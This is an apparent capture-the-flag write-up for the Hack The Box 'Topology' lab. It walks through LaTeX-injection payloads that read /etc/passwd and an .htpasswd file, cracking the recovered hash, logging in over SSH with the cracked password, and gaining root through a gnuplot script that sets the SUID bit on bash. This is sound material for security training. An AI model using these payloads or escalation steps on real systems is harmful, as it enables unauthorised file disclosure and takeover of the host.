Creating Host
sudo vim etc/hosts/
- add host as topology.htb
- Link: http://topology.htb/
nmap -A -sV
Home page
Found LaTeX Equation Generator but couldn’t redirect so adding this host name in etc/hosts/
Had no idea about this website so searched Latex equation vulnerabilities and found Formula/CSV/Doc/LaTeX Injection - HackTricks.
Now I wanted to read files from Latex code generator
command: \input{/etc/passwd}
NOTEIt’s latex language issue , when I execute command its in “text” mode by adding $ it goes into “math mode” to calculate and execute equations.
command: $\input{/etc/passwd}$
As we know /etc/passwd file is used to keep track of every registered user that has access to a system.
command: $\lstinputlisting{/etc/passwd}$
Found LFI
Scanning for Subdomains
wfuzz -c --hc=404 --hw=545 -t 200 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.topology.htb" http://topology.htb
Now, add dev.topology.htb
and stats.topology.htb
to etc/hosts/
Now we need to bypass this authentication, as we have seen this domain is running on Apache/2.4.41
Bypass Apache/2.4.41 401 Unauthorized
Command: $\lstinputlisting{/var/www/dev/.htpasswd}$
Finally found a Hash as a .PNG file
Hash: vdaisley : $apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0
Hash Cracking using John
command: john --wordlist=/usr/share/wordlists/rockyou.txt hash
Output: ?:calculus20
NoteAs see in our initial Nmap scan we have few SSH ports open.
Connect to SSH
command: ssh vdaisley@topology.htb
password: calculus20
After connecting to the ssh port you get the user flag.
Privilege Escaltion
Gaining Root access
Nothing interesting found here, except a executable “pspy64”.
IMPORTANT💡 pspy is a command line tool designed to snoop on processes without need for root permissions.
command: ./pspy64
command: /opt/gnuplot
command: ls
Output: ls: cannot open directory '.': Permission denied
Create a file within gnuplot dir
command bash-5.0$ nano /opt/gnuplot/root.plt
Reverse Shell - root.plt must contain system “chmod u+s”
command: bash -p
-p Turned on whenever the real and effective user ids do not match.
Disables processing of the $ENV file and importing of shell
functions. Turning this option off causes the effective uid and
gid to be set to the real uid and gid.
command: whoami
→ root
Obtained the root access. Now, move on to root dir.
There we have the root.txt.